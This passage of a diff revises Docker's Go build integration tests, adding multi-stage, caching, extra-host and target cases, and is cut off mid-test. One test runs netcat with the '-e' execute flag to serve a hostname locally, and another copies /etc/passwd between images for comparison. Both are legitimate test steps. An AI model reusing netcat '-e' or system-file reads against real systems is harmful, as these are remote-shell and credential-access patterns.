-	id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1")
-	c.Assert(err, checker.IsNil)
+	result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx))
+	id2 = getIDByName(c, "build2")
 	c.Assert(id1, checker.Equals, id2)
-	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3)
-	history1, _ := dockerCmd(c, "history", "-q", "build2")
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3)
+	history1 := cli.DockerCmd(c, "history", "-q", "build2").Combined()
 
 	// Retry, no new intermediate images
-	id3, out, err := buildImageFromContextWithOut("build3", ctx, true, "--cache-from=build1")
-	c.Assert(err, checker.IsNil)
+	result = cli.BuildCmd(c, "build3", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx))
+	id3 := getIDByName(c, "build3")
 	c.Assert(id1, checker.Equals, id3)
-	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3)
-	history2, _ := dockerCmd(c, "history", "-q", "build3")
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3)
+	history2 := cli.DockerCmd(c, "history", "-q", "build3").Combined()
 
 	c.Assert(history1, checker.Equals, history2)
-	dockerCmd(c, "rmi", "build2")
-	dockerCmd(c, "rmi", "build3")
-	dockerCmd(c, "rmi", "build1")
-	dockerCmd(c, "load", "-i", tempFile)
+	cli.DockerCmd(c, "rmi", "build2")
+	cli.DockerCmd(c, "rmi", "build3")
+	cli.DockerCmd(c, "rmi", "build1")
+	cli.DockerCmd(c, "load", "-i", tempFile)
 
 	// Modify file, everything up to last command and layers are reused
 	dockerfile = `
@@ -7147,13 +5483,13 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) {
 	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(dockerfile), 0644)
 	c.Assert(err, checker.IsNil)
 
-	id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1")
-	c.Assert(err, checker.IsNil)
+	result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx))
+	id2 = getIDByName(c, "build2")
 	c.Assert(id1, checker.Not(checker.Equals), id2)
-	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 2)
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2)
 
-	layers1Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1")
-	layers2Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2")
+	layers1Str := cli.DockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1").Combined()
+	layers2Str := cli.DockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2").Combined()
 
 	var layers1 []string
 	var layers2 []string
@@ -7167,16 +5503,40 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) {
 	c.Assert(layers1[len(layers1)-1], checker.Not(checker.Equals), layers2[len(layers1)-1])
 }
 
+func (s *DockerSuite) TestBuildMultiStageCache(c *check.C) {
+	testRequires(c, DaemonIsLinux) // All tests that do save are skipped in windows
+	dockerfile := `
+		FROM busybox
+		ADD baz /
+		FROM busybox
+    ADD baz /`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"Dockerfile": dockerfile,
+			"baz":        "baz",
+		}))
+	defer ctx.Close()
+
+	result := cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+	// second part of dockerfile was a repeat of first so should be cached
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 1)
+
+	result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx))
+	// now both parts of dockerfile should be cached
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2)
+}
+
 func (s *DockerSuite) TestBuildNetNone(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-
 	name := "testbuildnetnone"
-	_, out, err := buildImageWithOut(name, `
+	buildImage(name, cli.WithFlags("--network=none"), build.WithDockerfile(`
   FROM busybox
   RUN ping -c 1 8.8.8.8
-  `, true, "--network=none")
-	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "unreachable")
+  `)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Out:      "unreachable",
+	})
 }
 
 func (s *DockerSuite) TestBuildNetContainer(c *check.C) {
@@ -7185,85 +5545,446 @@ func (s *DockerSuite) TestBuildNetContainer(c *check.C) {
 	id, _ := dockerCmd(c, "run", "--hostname", "foobar", "-d", "busybox", "nc", "-ll", "-p", "1234", "-e", "hostname")
 
 	name := "testbuildnetcontainer"
-	out, err := buildImage(name, `
+	buildImageSuccessfully(c, name, cli.WithFlags("--network=container:"+strings.TrimSpace(id)),
+		build.WithDockerfile(`
   FROM busybox
   RUN nc localhost 1234 > /otherhost
-  `, true, "--network=container:"+strings.TrimSpace(id))
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+  `))
 
 	host, _ := dockerCmd(c, "run", "testbuildnetcontainer", "cat", "/otherhost")
 	c.Assert(strings.TrimSpace(host), check.Equals, "foobar")
 }
 
-func (s *DockerSuite) TestBuildSquashParent(c *check.C) {
-	testRequires(c, ExperimentalDaemon)
-	dockerFile := `
+func (s *DockerSuite) TestBuildWithExtraHost(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	name := "testbuildwithextrahost"
+	buildImageSuccessfully(c, name,
+		cli.WithFlags(
+			"--add-host", "foo:127.0.0.1",
+			"--add-host", "bar:127.0.0.1",
+		),
+		build.WithDockerfile(`
+  FROM busybox
+  RUN ping -c 1 foo
+  RUN ping -c 1 bar
+  `))
+}
+
+func (s *DockerSuite) TestBuildWithExtraHostInvalidFormat(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerfile := `
 		FROM busybox
-		RUN echo hello > /hello
-		RUN echo world >> /hello
-		RUN echo hello > /remove_me
-		ENV HELLO world
-		RUN rm /remove_me
-		`
-	// build and get the ID that we can use later for history comparison
-	origID, err := buildImage("test", dockerFile, false)
-	c.Assert(err, checker.IsNil)
+		RUN ping -c 1 foo`
 
-	// build with squash
-	id, err := buildImage("test", dockerFile, true, "--squash")
-	c.Assert(err, checker.IsNil)
+	testCases := []struct {
+		testName   string
+		dockerfile string
+		buildFlag  string
+	}{
+		{"extra_host_missing_ip", dockerfile, "--add-host=foo"},
+		{"extra_host_missing_ip_with_delimiter", dockerfile, "--add-host=foo:"},
+		{"extra_host_missing_hostname", dockerfile, "--add-host=:127.0.0.1"},
+		{"extra_host_invalid_ipv4", dockerfile, "--add-host=foo:101.10.2"},
+		{"extra_host_invalid_ipv6", dockerfile, "--add-host=foo:2001::1::3F"},
+	}
 
-	out, _ := dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "cat /hello")
-	c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nworld")
+	for _, tc := range testCases {
+		result := buildImage(tc.testName, cli.WithFlags(tc.buildFlag), build.WithDockerfile(tc.dockerfile))
+		result.Assert(c, icmd.Expected{
+			ExitCode: 125,
+		})
+	}
 
-	dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "[ ! -f /remove_me ]")
-	dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`)
+}
 
-	// make sure the ID produced is the ID of the tag we specified
-	inspectID, err := inspectImage("test", ".ID")
-	c.Assert(err, checker.IsNil)
-	c.Assert(inspectID, checker.Equals, id)
+func (s *DockerSuite) TestBuildContChar(c *check.C) {
+	name := "testbuildcontchar"
 
-	origHistory, _ := dockerCmd(c, "history", origID)
-	testHistory, _ := dockerCmd(c, "history", "test")
+	buildImage(name, build.WithDockerfile(`FROM busybox\`)).Assert(c, icmd.Expected{
+		Out: "Step 1/1 : FROM busybox",
+	})
 
-	splitOrigHistory := strings.Split(strings.TrimSpace(origHistory), "\n")
-	splitTestHistory := strings.Split(strings.TrimSpace(testHistory), "\n")
-	c.Assert(len(splitTestHistory), checker.Equals, len(splitOrigHistory)+1)
+	result := buildImage(name, build.WithDockerfile(`FROM busybox
+		 RUN echo hi \`))
+	result.Assert(c, icmd.Success)
+	c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi\n")
 
-	out, err = inspectImage(id, "len .RootFS.Layers")
-	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Equals, "3")
+	result = buildImage(name, build.WithDockerfile(`FROM busybox
+		 RUN echo hi \\`))
+	result.Assert(c, icmd.Success)
+	c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi \\\n")
+
+	result = buildImage(name, build.WithDockerfile(`FROM busybox
+		 RUN echo hi \\\`))
+	result.Assert(c, icmd.Success)
+	c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi \\\\\n")
 }
 
-func (s *DockerSuite) TestBuildContChar(c *check.C) {
-	name := "testbuildcontchar"
+func (s *DockerSuite) TestBuildMultiStageCopyFromSyntax(c *check.C) {
+	dockerfile := `
+		FROM busybox AS first
+		COPY foo bar
 
-	_, out, err := buildImageWithOut(name,
-		`FROM busybox\`, true)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "Step 1/1 : FROM busybox")
+		FROM busybox
+		%s
+		COPY baz baz
+		RUN echo mno > baz/cc
 
-	_, out, err = buildImageWithOut(name,
-		`FROM busybox
-		 RUN echo hi \`, true)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox")
-	c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi\n")
+		FROM busybox
+		COPY bar /
+		COPY --from=1 baz sub/
+		COPY --from=0 bar baz
+		COPY --from=first bar bay`
+
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(fmt.Sprintf(dockerfile, "")),
+		fakecontext.WithFiles(map[string]string{
+			"foo":    "abc",
+			"bar":    "def",
+			"baz/aa": "ghi",
+			"baz/bb": "jkl",
+		}))
+	defer ctx.Close()
 
-	_, out, err = buildImageWithOut(name,
-		`FROM busybox
-		 RUN echo hi \\`, true)
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+
+	cli.DockerCmd(c, "run", "build1", "cat", "bar").Assert(c, icmd.Expected{Out: "def"})
+	cli.DockerCmd(c, "run", "build1", "cat", "sub/aa").Assert(c, icmd.Expected{Out: "ghi"})
+	cli.DockerCmd(c, "run", "build1", "cat", "sub/cc").Assert(c, icmd.Expected{Out: "mno"})
+	cli.DockerCmd(c, "run", "build1", "cat", "baz").Assert(c, icmd.Expected{Out: "abc"})
+	cli.DockerCmd(c, "run", "build1", "cat", "bay").Assert(c, icmd.Expected{Out: "abc"})
+
+	result := cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx))
+
+	// all commands should be cached
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 7)
+	c.Assert(getIDByName(c, "build1"), checker.Equals, getIDByName(c, "build2"))
+
+	err := ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(fmt.Sprintf(dockerfile, "COPY baz/aa foo")), 0644)
 	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox")
-	c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\n")
 
-	_, out, err = buildImageWithOut(name,
-		`FROM busybox
-		 RUN echo hi \\\`, true)
+	// changing file in parent block should not affect last block
+	result = cli.BuildCmd(c, "build3", build.WithExternalBuildContext(ctx))
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 5)
+
+	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("pqr"), 0644)
 	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox")
-	c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\\\n")
+
+	// changing file in parent block should affect both first and last block
+	result = cli.BuildCmd(c, "build4", build.WithExternalBuildContext(ctx))
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 5)
+
+	cli.DockerCmd(c, "run", "build4", "cat", "bay").Assert(c, icmd.Expected{Out: "pqr"})
+	cli.DockerCmd(c, "run", "build4", "cat", "baz").Assert(c, icmd.Expected{Out: "pqr"})
+}
+
+func (s *DockerSuite) TestBuildMultiStageCopyFromErrors(c *check.C) {
+	testCases := []struct {
+		dockerfile    string
+		expectedError string
+	}{
+		{
+			dockerfile: `
+		FROM busybox
+		COPY --from=foo foo bar`,
+			expectedError: "invalid from flag value foo",
+		},
+		{
+			dockerfile: `
+		FROM busybox
+		COPY --from=0 foo bar`,
+			expectedError: "invalid from flag value 0: refers to current build stage",
+		},
+		{
+			dockerfile: `
+		FROM busybox AS foo
+		COPY --from=bar foo bar`,
+			expectedError: "invalid from flag value bar",
+		},
+		{
+			dockerfile: `
+		FROM busybox AS 1
+		COPY --from=1 foo bar`,
+			expectedError: "invalid name for build stage",
+		},
+	}
+
+	for _, tc := range testCases {
+		ctx := fakecontext.New(c, "",
+			fakecontext.WithDockerfile(tc.dockerfile),
+			fakecontext.WithFiles(map[string]string{
+				"foo": "abc",
+			}))
+
+		cli.Docker(cli.Build("build1"), build.WithExternalBuildContext(ctx)).Assert(c, icmd.Expected{
+			ExitCode: 1,
+			Err:      tc.expectedError,
+		})
+
+		ctx.Close()
+	}
+}
+
+func (s *DockerSuite) TestBuildMultiStageMultipleBuilds(c *check.C) {
+	dockerfile := `
+		FROM busybox
+		COPY foo bar`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"foo": "abc",
+		}))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+
+	dockerfile = `
+		FROM build1:latest AS foo
+    FROM busybox
+		COPY --from=foo bar /
+		COPY foo /`
+	ctx = fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"foo": "def",
+		}))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx))
+
+	out := cli.DockerCmd(c, "run", "build2", "cat", "bar").Combined()
+	c.Assert(strings.TrimSpace(out), check.Equals, "abc")
+	out = cli.DockerCmd(c, "run", "build2", "cat", "foo").Combined()
+	c.Assert(strings.TrimSpace(out), check.Equals, "def")
+}
+
+func (s *DockerSuite) TestBuildMultiStageImplicitFrom(c *check.C) {
+	dockerfile := `
+		FROM busybox
+		COPY --from=busybox /etc/passwd /mypasswd
+		RUN cmp /etc/passwd /mypasswd`
+
+	if DaemonIsWindows() {
+		dockerfile = `
+			FROM busybox
+			COPY --from=busybox License.txt foo`
+	}
+
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+	)
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+
+	if DaemonIsWindows() {
+		out := cli.DockerCmd(c, "run", "build1", "cat", "License.txt").Combined()
+		c.Assert(len(out), checker.GreaterThan, 10)
+		out2 := cli.DockerCmd(c, "run", "build1", "cat", "foo").Combined()
+		c.Assert(out, check.Equals, out2)
+	}
+}
+
+func (s *DockerRegistrySuite) TestBuildMultiStageImplicitPull(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/testf", privateRegistryURL)
+
+	dockerfile := `
+		FROM busybox
+		COPY foo bar`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"foo": "abc",
+		}))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, repoName, build.WithExternalBuildContext(ctx))
+
+	cli.DockerCmd(c, "push", repoName)
+	cli.DockerCmd(c, "rmi", repoName)
+
+	dockerfile = `
+		FROM busybox
+		COPY --from=%s bar baz`
+
+	ctx = fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(dockerfile, repoName)))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+
+	cli.Docker(cli.Args("run", "build1", "cat", "baz")).Assert(c, icmd.Expected{Out: "abc"})
+}
+
+func (s *DockerSuite) TestBuildMultiStageNameVariants(c *check.C) {
+	dockerfile := `
+		FROM busybox as foo
+		COPY foo /
+		FROM foo as foo1
+		RUN echo 1 >> foo
+		FROM foo as foO2
+		RUN echo 2 >> foo
+		FROM foo
+		COPY --from=foo1 foo f1
+		COPY --from=FOo2 foo f2
+		` // foo2 case also tests that names are case insensitive
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"foo": "bar",
+		}))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+	cli.Docker(cli.Args("run", "build1", "cat", "foo")).Assert(c, icmd.Expected{Out: "bar"})
+	cli.Docker(cli.Args("run", "build1", "cat", "f1")).Assert(c, icmd.Expected{Out: "bar1"})
+	cli.Docker(cli.Args("run", "build1", "cat", "f2")).Assert(c, icmd.Expected{Out: "bar2"})
+}
+
+func (s *DockerSuite) TestBuildMultiStageMultipleBuildsWindows(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	dockerfile := `
+		FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		COPY foo c:\\bar`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"foo": "abc",
+		}))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+
+	dockerfile = `
+		FROM build1:latest
+    	FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		COPY --from=0 c:\\bar /
+		COPY foo /`
+	ctx = fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"foo": "def",
+		}))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx))
+
+	out := cli.DockerCmd(c, "run", "build2", "cmd.exe", "/s", "/c", "type", "c:\\bar").Combined()
+	c.Assert(strings.TrimSpace(out), check.Equals, "abc")
+	out = cli.DockerCmd(c, "run", "build2", "cmd.exe", "/s", "/c", "type", "c:\\foo").Combined()
+	c.Assert(strings.TrimSpace(out), check.Equals, "def")
+}
+
+func (s *DockerSuite) TestBuildCopyFromForbidWindowsSystemPaths(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	dockerfile := `
+		FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		COPY --from=0 %s c:\\oscopy
+		`
+	exp := icmd.Expected{
+		ExitCode: 1,
+		Err:      "copy from c:\\ or c:\\windows is not allowed on windows",
+	}
+	buildImage("testforbidsystempaths1", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\"))).Assert(c, exp)
+	buildImage("testforbidsystempaths2", build.WithDockerfile(fmt.Sprintf(dockerfile, "C:\\\\"))).Assert(c, exp)
+	buildImage("testforbidsystempaths3", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\windows"))).Assert(c, exp)
+	buildImage("testforbidsystempaths4", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\wInDows"))).Assert(c, exp)
+}
+
+func (s *DockerSuite) TestBuildCopyFromForbidWindowsRelativePaths(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	dockerfile := `
+		FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		COPY --from=0 %s c:\\oscopy
+		`
+	exp := icmd.Expected{
+		ExitCode: 1,
+		Err:      "copy from c:\\ or c:\\windows is not allowed on windows",
+	}
+	buildImage("testforbidsystempaths1", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:"))).Assert(c, exp)
+	buildImage("testforbidsystempaths2", build.WithDockerfile(fmt.Sprintf(dockerfile, "."))).Assert(c, exp)
+	buildImage("testforbidsystempaths3", build.WithDockerfile(fmt.Sprintf(dockerfile, "..\\\\"))).Assert(c, exp)
+	buildImage("testforbidsystempaths4", build.WithDockerfile(fmt.Sprintf(dockerfile, ".\\\\windows"))).Assert(c, exp)
+	buildImage("testforbidsystempaths5", build.WithDockerfile(fmt.Sprintf(dockerfile, "\\\\windows"))).Assert(c, exp)
+}
+
+func (s *DockerSuite) TestBuildCopyFromWindowsIsCaseInsensitive(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	dockerfile := `
+		FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		COPY foo /
+		FROM ` + testEnv.PlatformDefaults.BaseImage + `
+		COPY --from=0 c:\\fOo c:\\copied
+		RUN type c:\\copied
+		`
+	cli.Docker(cli.Build("copyfrom-windows-insensitive"), build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile("foo", "hello world"),
+	)).Assert(c, icmd.Expected{
+		ExitCode: 0,
+		Out:      "hello world",
+	})
+}
+
+// #33176
+func (s *DockerSuite) TestBuildMulitStageResetScratch(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	dockerfile := `
+		FROM busybox
+		WORKDIR /foo/bar
+		FROM scratch
+		ENV FOO=bar
+		`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+	)
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+
+	res := cli.InspectCmd(c, "build1", cli.Format(".Config.WorkingDir")).Combined()
+	c.Assert(strings.TrimSpace(res), checker.Equals, "")
+}
+
+func (s *DockerSuite) TestBuildIntermediateTarget(c *check.C) {
+	//todo: need to be removed after 18.06 release
+	if strings.Contains(testEnv.DaemonInfo.ServerVersion, "18.05.0") {
+		c.Skip(fmt.Sprintf("Bug fixed in 18.06 or higher.Skipping it for %s", testEnv.DaemonInfo.ServerVersion))
+	}
+	dockerfile := `
+		FROM busybox AS build-env
+		CMD ["/dev"]
+		FROM busybox
+		CMD ["/dist"]
+		`
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx),
+		cli.WithFlags("--target", "build-env"))
+
+	res := cli.InspectCmd(c, "build1", cli.Format("json .Config.Cmd")).Combined()
+	c.Assert(strings.TrimSpace(res), checker.Equals, `["/dev"]`)
+
+	// Stage name is case-insensitive by design
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx),
+		cli.WithFlags("--target", "BUIld-EnV"))
+
+	res = cli.InspectCmd(c, "build1", cli.Format("json .Config.Cmd")).Combined()
+	c.Assert(strings.TrimSpace(res), checker.Equals, `["/dev"]`)
+
+	result := cli.Docker(cli.Build("build1"), build.WithExternalBuildContext(ctx),
+		cli.WithFlags("--target", "nosuchtarget"))
+	result.Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "failed to reach build target",
+	})
 }
 
 // TestBuildOpaqueDirectory tests that a build succeeds which
@@ -7271,7 +5992,6 @@ func (s *DockerSuite) TestBuildContChar(c *check.C) {
 // See https://github.com/docker/docker/issues/25244
 func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-
 	dockerFile := `
 		FROM busybox
 		RUN mkdir /dir1 && touch /dir1/f1
@@ -7279,28 +5999,22 @@ func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) {
 		RUN touch /dir1/f3
 		RUN [ -f /dir1/f2 ]
 		`
-
 	// Test that build succeeds, last command fails if opaque directory
 	// was not handled correctly
-	_, err := buildImage("testopaquedirectory", dockerFile, false)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, "testopaquedirectory", build.WithDockerfile(dockerFile))
 }
 
 // Windows test for USER in dockerfile
 func (s *DockerSuite) TestBuildWindowsUser(c *check.C) {
 	testRequires(c, DaemonIsWindows)
 	name := "testbuildwindowsuser"
-	_, out, err := buildImageWithOut(name,
-		`FROM `+WindowsBaseImage+`
+	buildImage(name, build.WithDockerfile(`FROM `+testEnv.PlatformDefaults.BaseImage+`
 		RUN net user user /add
 		USER user
 		RUN set username
-		`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	c.Assert(strings.ToLower(out), checker.Contains, "username=user")
+		`)).Assert(c, icmd.Expected{
+		Out: "USERNAME=user",
+	})
 }
 
 // Verifies if COPY file . when WORKDIR is set to a non-existing directory,
@@ -7310,83 +6024,186 @@ func (s *DockerSuite) TestBuildWindowsUser(c *check.C) {
 // Note 27545 was reverted in 28505, but a new fix was added subsequently in 28514.
 func (s *DockerSuite) TestBuildCopyFileDotWithWorkdir(c *check.C) {
 	name := "testbuildcopyfiledotwithworkdir"
-	ctx, err := fakeContext(`FROM busybox 
-WORKDIR /foo 
-COPY file . 
-RUN ["cat", "/foo/file"] 
-`,
-		map[string]string{})
-
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if err := ctx.Add("file", "content"); err != nil {
-		c.Fatal(err)
-	}
-
-	if _, err = buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
+WORKDIR /foo
+COPY file .
+RUN ["cat", "/foo/file"]
+`),
+		build.WithFile("file", "content"),
+	))
 }
 
 // Case-insensitive environment variables on Windows
 func (s *DockerSuite) TestBuildWindowsEnvCaseInsensitive(c *check.C) {
 	testRequires(c, DaemonIsWindows)
 	name := "testbuildwindowsenvcaseinsensitive"
-	if _, err := buildImage(name, `
-		FROM `+WindowsBaseImage+`
-		ENV FOO=bar foo=bar
-  `, true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
+		FROM `+testEnv.PlatformDefaults.BaseImage+`
+		ENV FOO=bar foo=baz
+  `))
 	res := inspectFieldJSON(c, name, "Config.Env")
-	if res != `["foo=bar"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped.
+	if res != `["foo=baz"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped.
 		c.Fatalf("Case insensitive environment variables on Windows failed. Got %s", res)
 	}
 }
 
 // Test case for 29667
 func (s *DockerSuite) TestBuildWorkdirImageCmd(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-
 	image := "testworkdirimagecmd"
-	dockerfile := `
+	buildImageSuccessfully(c, image, build.WithDockerfile(`
 FROM busybox
 WORKDIR /foo/bar
-`
-	out, err := buildImage(image, dockerfile, true)
-	c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out))
+`))
+	out, _ := dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image)
 
-	out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image)
-	c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`)
+	// The Windows busybox image has a blank `cmd`
+	lookingFor := `["sh"]`
+	if testEnv.OSType == "windows" {
+		lookingFor = "null"
+	}
+	c.Assert(strings.TrimSpace(out), checker.Equals, lookingFor)
 
 	image = "testworkdirlabelimagecmd"
-	dockerfile = `
+	buildImageSuccessfully(c, image, build.WithDockerfile(`
 FROM busybox
 WORKDIR /foo/bar
 LABEL a=b
-`
-	out, err = buildImage(image, dockerfile, true)
-	c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out))
+`))
 
 	out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image)
-	c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`)
+	c.Assert(strings.TrimSpace(out), checker.Equals, lookingFor)
 }
 
-// Test case for 28902/28090
+// Test case for 28902/28909
 func (s *DockerSuite) TestBuildWorkdirCmd(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-
+	name := "testbuildworkdircmd"
 	dockerFile := `
-                FROM golang:1.7-alpine
+                FROM busybox
                 WORKDIR /
                 `
-	_, err := buildImage("testbuildworkdircmd", dockerFile, true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile))
+	result := buildImage(name, build.WithDockerfile(dockerFile))
+	result.Assert(c, icmd.Success)
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 1)
+}
+
+// FIXME(vdemeester) should be a unit test
+func (s *DockerSuite) TestBuildLineErrorOnBuild(c *check.C) {
+	name := "test_build_line_error_onbuild"
+	buildImage(name, build.WithDockerfile(`FROM busybox
+  ONBUILD
+  `)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Dockerfile parse error line 2: ONBUILD requires at least one argument",
+	})
+}
 
-	_, out, err := buildImageWithOut("testbuildworkdircmd", dockerFile, true)
-	c.Assert(err, checker.IsNil)
-	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 1)
+// FIXME(vdemeester) should be a unit test
+func (s *DockerSuite) TestBuildLineErrorUnknownInstruction(c *check.C) {
+	name := "test_build_line_error_unknown_instruction"
+	cli.Docker(cli.Build(name), build.WithDockerfile(`FROM busybox
+  RUN echo hello world
+  NOINSTRUCTION echo ba
+  RUN echo hello
+  ERROR
